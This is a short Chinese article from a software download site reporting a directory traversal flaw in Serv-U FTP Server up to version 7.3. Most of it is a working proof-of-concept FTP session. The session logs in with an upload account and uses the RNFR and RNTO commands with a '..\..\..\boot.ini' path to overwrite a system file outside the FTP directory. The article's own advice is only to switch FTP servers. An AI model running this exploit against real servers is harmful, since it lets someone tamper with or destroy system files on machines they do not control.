文章中心 -> 电脑常识

文章正文

Serv-U FTP Server <= 7.3 有一个目录遍历漏洞,可以覆盖系统上的任意文件,利用这个漏洞必须有一个upload权限的账号。不清楚哪个版本开始支持rnfr 和 rnto 的命令,官方还没有补丁,建议用Serv-U FTP Server的同学改用其他FTP Server程序或者用低版本的。

漏洞利用过程:
#Serv-U 7.2.0.1 ftp file replacement
#user must have upload permissions
#
#(x) dmnt 2008-10-01
220 Serv-U FTP Server v7.2 ready...
user test
331 User name okay, need password.
pass test
230 User logged in, proceed.
rnfr any_exist_file.ext
350 File or directory exists, ready for destination name.
rnto ..\..\..\boot.ini
250 RNTO command successful.
#boot.ini rewrited

文章来自绿盟(xDowns.com)转载请注明来路。

上一篇文章:什么是绿色软件? []

相关文章

· 【更新】Serv-U FTP Server 7.0.0.2 - 好用的FTP服务器端
· 【发布】Serv-U 7.0.0.1 - 好用的FTP服务器端

相关软件

  • 远程修改SERV-U帐号密码 1.1
  • ZZphpserver 2.5| IIS+php+mysql+Rewrite+navicat+Serv-u服务器环境一键安装包
  • Serv-U FTP Server 15.0.1.20 官方多语版
  • 【不提供下载】Serv-U FTP Server
  • Serv-U FTP Server V7.0.0.1 完美者多国语言特别版_功能强大易用FTP 服务器
  • Serv-U FTP Server V6.0.0.2_绿色汉化特别版_绿盟专用无后门无漏洞版本
  • Serv-U Corporate Edition 8.0.0.4 官方多语版
  • 【不提供下载】Serv-U FTP Server